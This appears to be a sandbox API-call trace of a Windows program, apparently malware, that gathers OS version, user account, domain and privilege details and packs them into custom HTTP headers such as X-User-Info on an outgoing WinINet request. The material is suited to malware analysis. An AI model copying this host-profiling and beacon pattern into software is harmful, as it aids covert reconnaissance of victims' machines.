	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.338] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.339] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] wsprintfW (in: param_1=0x66b0b8, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0098.340] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0098.340] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.340] GetLastError () returned 0x0
	[0098.341] GetLastError () returned 0x0
	[0098.341] wsprintfW (in: param_1=0x66b0b8, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 3007") returned 16
	[0098.341] lstrlenW (lpString="X-VendorId: 3007") returned 16
	[0098.341] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 3007", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0098.341] GetCurrentProcess () returned 0xffffffff
	[0098.341] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x205f2c4 | out: TokenHandle=0x205f2c4*=0x2e4) returned 1
	[0098.341] GetTokenInformation (in: TokenHandle=0x2e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x205f2a0 | out: TokenInformation=0x0, ReturnLength=0x205f2a0) returned 0
	[0098.341] GetLastError () returned 0x7a
	[0098.341] GetTokenInformation (in: TokenHandle=0x2e4, TokenInformationClass=0x1, TokenInformation=0x65a4d0, TokenInformationLength=0x24, ReturnLength=0x205f2a0 | out: TokenInformation=0x65a4d0, ReturnLength=0x205f2a0) returned 1
	[0098.341] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x65a4d8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2e)), Name=0x66c510, cchName=0x205f294, ReferencedDomainName=0x66c718, cchReferencedDomainName=0x205f294, peUse=0x205f288 | out: Name="Nd9E1FYi", cchName=0x205f294, ReferencedDomainName="X2VS1CUM", cchReferencedDomainName=0x205f294, peUse=0x205f288) returned 1
	[0098.342] CloseHandle (hObject=0x2e4) returned 1
	[0098.342] CloseHandle (hObject=0xffffffff) returned 1
	[0098.342] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x205f2c4 | out: bufptr=0x66f8e0*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x1867714, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x66f977, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0098.346] GetLastError () returned 0x0
	[0098.346] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.347] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.348] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.349] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.350] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] GetLastError () returned 0x0
	[0098.351] wsprintfW (in: param_1=0x66b0b8, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0098.351] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0098.351] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0098.351] NetApiBufferFree (Buffer=0x66f8e0) returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.405] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.406] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x205f1a8, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0098.407] wsprintfW (in: param_1=0x66b0b8, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0098.407] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0098.407] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.407] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.408] GetLastError () returned 0x0
	[0098.409] lstrlenW (lpString="X-HTTP-Agent: WININET") returned 21
	[0098.409] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
	[0098.409] GetLastError () returned 0x0
